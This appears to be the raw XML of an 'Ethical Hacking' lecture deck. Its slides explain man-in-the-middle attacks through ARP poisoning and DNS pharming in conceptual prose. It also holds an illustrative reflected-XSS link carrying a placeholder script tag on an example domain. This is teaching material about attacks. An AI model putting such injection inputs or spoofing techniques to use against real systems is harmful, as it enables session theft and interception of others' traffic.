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8" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="279" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="281" r:id="rId22"/>
    <p:sldId id="293" r:id="rId23"/>
    <p:sldId id="282" r:id="rId24"/>
    <p:sldId id="283" r:id="rId25"/>
    <p:sldId id="284" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="287" r:id="rId29"/>
    <p:sldId id="288" r:id="rId30"/>
    <p:sldId id="294" r:id="rId31"/>
    <p:sldId id="295" r:id="rId32"/>
    <p:sldId id="296" r:id="rId33"/>
    <p:sldId id="291"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1592-7553-4F07-BAFD-5CEFA66C7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75E89B-A28C-4F76-A012-49B0A1885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9C0744-9B36-4849-B112-729D43570EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C21970BB-75AD-4F9C-A399-F5A70A384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DD0276-B71F-45FD-8DDC-7A693F458665}"/>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344328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02C8-D342-42BD-86A7-F7426C7FDB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528FEF-955E-4EF9-AF8A-81E4E9A224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65BD16-1A26-493C-81FA-0F93D54900CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{714BA853-BE4D-43B4-B67E-B1CBEED8C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A23359-8C01-4E1B-96D1-880DD040F2CC}"/>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343962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48805-EDB8-49BB-9E92-A6E5380DA8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133858-A2C3-480C-9F5A-56645A6F62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DB544E-76A4-4AE0-944E-48965D948F0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46985EBE-F091-4BD0-81D5-7697F2F2CE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49440-6176-4DEE-BE4C-28E8BD6953ED}"/>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202205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7411-384E-42DD-BD5E-FEF6CEEE70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6CFAB8-E89C-4AAC-839F-D5255CFB06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2FE8B-7C7A-496E-9C2B-29739D489D23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37D5B271-E326-499C-A1DD-D8082747C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04EC8-8007-4660-AD17-B08914420E43}"/>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30247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3D89-9354-4F79-9980-D4B55AA5D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C6B7A9-954A-44B0-A2DA-9FE75078D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F00520-A347-4537-BCA6-2642E8A19FED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F463769-B95E-408A-A54D-75B7A2C48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B73B6-1C08-4601-90A5-E533C6DA54D5}"/>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425548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D951-9654-4F91-9E53-A2BD31C9BA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69C9D-0909-4040-A7B3-BB2BA5475F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FC3BEB-4FBE-4BF0-8907-92F3C9E20C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648C2B-8874-4047-A0CA-5B6AD29C5B7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{619B8C06-97D1-4CEF-8B99-4BFA48DE5A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705659-601A-4839-80BF-DCE826FC4780}"/>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307383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8C68-500A-4D1A-B761-582D19783C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F2D5E9-4FC5-4EF4-9091-BE9ADB9BD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4E52C4-42BC-427E-8D5D-9CECDA3334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08C147-DC0E-4B1D-8C73-3363CC8494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4AF18D-6C8E-47FD-93DE-5811079ED3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F07366-849F-4411-A361-D1B315EBAF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5DF1DD8-C7A7-4ED9-A872-28D6CF0611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04E3D5-7EFE-4BE7-89CF-BA78ABE69438}"/>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110221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2025-B68A-4544-A441-375AACDAEE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0B1B49-01A9-45C8-A29E-153F128612DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F9D6AF6-2BE9-4CA2-B931-FB1BA04D8C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AED57F-FBED-441E-AA95-6AD4AE02FB85}"/>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221071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D9250-14ED-4692-94DE-C041E092AC46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA564714-F55D-4298-9D50-60CCE718E0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581864-4E8F-4551-93DD-FC74ED8A8ADD}"/>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285123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151F-4567-4D4F-9D41-0B12947A6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604B57-0691-45C2-BEAC-A35B82BD0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252940-0D8B-4005-AF29-C746AE658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ADE11C-5D4E-461F-8EA9-3CAF8EDD9930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083B514B-4C6F-4F7E-B0E1-CB72B212F4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450BC4-F61D-42D8-BBD5-9EC2658F1A6C}"/>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81301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FCA7-E235-432E-9DD9-343CEC953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49905B-A185-4BA7-80F8-A86F31A91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5613BD-C304-4D7C-942F-5229BEE2F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A1DB46-8132-4B68-AFB2-352294033850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF5045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EFE692F-A3C2-4343-8E17-2A8BAB0F76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65F99-3F59-492E-8531-50A30CE63A47}"/>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373882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C17F5-9F56-420B-8A58-870416B3D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D1731B-E36E-4C7A-9262-62CF88538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3D958-4921-4651-B316-0907FCB0A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045EA-9754-4F2F-AD3F-99980D9C3A6A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-11-2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF530AE0-AF30-4D71-A717-F5010CDD29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B47F30-5399-4799-89B7-E6A8CEF5C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8CC4F-1081-4754-AB8C-1BBD9D086104}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4133171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insecure-website.com/status?message=%3cscript%3e/*+Bad+stuff+here...+*/%3c/script" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insecure-website.com/search?term=gif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1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Baskerville Old Face" panose="02020602080505020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ethical Hacking </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Mohona</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> Ghosh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301184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A588B4-7D20-42DA-8918-D9D2491B21E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="924284" y="-1"/>
            <a:ext cx="10173677" cy="6612835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329841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CFBD-C238-4AA8-B0AA-99603E046260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Various ways to do MITM attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E2D6BD-4483-4404-BEF7-D32DA675330A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10903226" cy="4773958"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP Poisoning </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>ARP does the MAC address to IP address translation. In a normal and healthy situation, when a TCPIP protocol stack running on the source computer wants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to send a packet to a destination IP address, it first looks into its local cache for a mapping of the IP with a MAC address. If the entry can't be found, it starts an ARP broadcast asking for a MAC address, for the given IP address. The machine who owns that IP address responds back to the ARP query with its own MAC address. The source then uses it to create the Ethernet frame and starts transmission to that IP.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>At the same time, the source machine marks the IP to MAC entry in its local cache, so that it could be used to speed up the communication for future requests to the same IP, by avoiding the broadcasts. ARP is a stateless protocol and also the cache does not have its own security mechanism, which results into a serious vulnerability. The underlying mechanism of MITM being packet spoofing and forging, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the attacker sends spoofed ARP packets on the local area network, to associate attackers own machine's MAC address with the IP address of another host which is the target. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This forged packet can be as simple as an ICMP packet typically used to Ping a host. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The traffic originating for the destination, now in fact reaches attackers machine due to the binding between IP and MAC addresses. Attacker can use the same method to fool another machine, and be able to view communication between both the infected targets, thus making it a local area network specific man in the middle attack. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Once the control is achieved, the hacker simply collects the packet from sender, and forwards it to the receiver while recording the packet stream in between. Since there is no data being lost in this whole process, both the victims has no clue about this, thus helping hacker to hide and yet steal the data. ARP poisoning is widely used in internal attacks whereby a smart hacker or evil guy working on the same local area network can steal sessions which results into a data theft. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="512268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0EB2-D829-4EF1-9D03-02030E19C40C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Various ways to do MITM attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13EAFAB-039D-4324-A418-014E1063D7C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS MITM (i.e., through Pharming attack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> translates domain names to IP addresses so browsers can load Internet resources. Whenever you type in a web address such as http://www.google.com into your browser, a DNS request is made to a DNS server in order to find out what IP address that name resolves to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> A DNS server itself works by storing a database of entries (called resource records) of IP address to DNS name mappings, communicating those resource records to clients, and communicating those resource records to other DNS servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106775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77A5-F57E-4BA9-B00F-B5FDCAC4AD0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Various ways to do MITM attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{987998DC-3C8A-4A5D-9419-5FC6C6440A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212035" y="1825625"/>
            <a:ext cx="5807765" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>DNS functions in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>query/response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>type format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A client wishing to resolve a DNS name to an IP address sends a query to a DNS server, and the server sends the requested information in its response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From the clients' perspective, the only two packets that are seen are this query and response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545BA7C7-4F96-4B64-A112-44717A5C81DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6953250" y="3058146"/>
            <a:ext cx="4400550" cy="1457325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104981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E333-A2EE-437F-9D0E-EB834E05136A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
